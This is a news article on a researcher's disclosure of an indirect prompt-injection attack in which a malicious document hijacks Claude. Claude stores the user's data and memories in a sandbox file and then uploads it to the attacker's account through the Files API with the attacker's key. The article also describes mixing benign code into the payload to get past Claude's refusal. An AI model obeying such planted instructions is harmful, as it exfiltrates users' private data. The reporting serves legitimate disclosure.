Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Artificial Intelligence

Claude AI APIs Can Be Abused for Data Exfiltration

An attacker can inject indirect prompts to trick the model into harvesting user data and sending it to the attacker’s account.

Claude

Attackers can use indirect prompt injections to trick Anthropic’s Claude into exfiltrating data the AI model’s users have access to, a security researcher has discovered.

The attack, Johann Rehberger of Embrace The Red explains, abuses Claude’s Files APIs, and is only possible if the AI model has network access (a feature enabled by default on certain plans and meant to allow Claude to access certain resources, such as code repositories and Anthropic APIs).

The attack is relatively straightforward: an indirect prompt injection payload can be used to read user data and store it in a file in Claude Code Interpreter’s sandbox, and then to trick the model into interacting with the Anthropic API using a key provided by the attacker.

The code in the payload requests Claude to upload the Code Interpreter file from the sandbox but, because the attacker’s API key is used, the file is uploaded to the attacker’s account.

“With this technique an adversary can exfiltrate up to 30MB at once according to the file API documentation, and of course we can upload multiple files,” Rehberger explains.

After the initial attempt was successful, Claude refused the payload, especially with the API key in plain text, and Rehberger had to mix benign code in the prompt injection, to convince Claude that it does not have malicious intent.

Advertisement. Scroll to continue reading.

The attack starts with the user loading a malicious document received from the attacker in Claude for analysis. The exploit code hijacks the model, which follows the malicious instructions to harvest the user’s data, save it to the sandbox, and then call the Anthropic File API to send it to the attacker’s account.

According to the researcher, the attack can be used to exfiltrate the user’s chat conversations, which are saved by Claude using the newly introduced ‘memories’ feature. The attacker can view and access the exfiltrated file in their console.

The researcher disclosed the attack to Anthropic via HackerOne on October 25, but the report was closed with the explanation that this was a model safety issue and not a security vulnerability.

However, after publishing information on the attack, Rehberger was notified by Anthropic that the data exfiltration vulnerability is in-scope for reporting.

Anthropic’s documentation underlines the risks associated with Claude having network access and of potential attacks carried out via external files or websites leading to code execution and information leaks. It also provides recommended mitigations against such attacks.

SecurityWeek has emailed Anthropic to inquire whether the company plans to devise a mitigation for such attacks.

Related: All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

Related: Nvidia Triton Vulnerabilities Pose Big Risk to AI Models

Related: AI Sidebar Spoofing Puts ChatGPT Atlas, Perplexity Comet and Other Browsers at Risk

Related: Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

With "Shadow AI" usage becoming prevalent in organizations, learn how to balance the need for rapid experimentation with the rigorous controls required for enterprise-grade deployment.

Register

Delve into big-picture strategies to reduce attack surfaces, improve patch management, conduct post-incident forensics, and tools and tricks needed in a modern organization.

Register

People on the Move

Chris Sistrunk has been promoted to Practice Leader for Mandiant's OT Security Consulting.

Nudge Security has appointed Patrick Dillon as its Chief Revenue Officer.

AutoNation has appointed Brian Fricke as Chief Information Security Officer.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.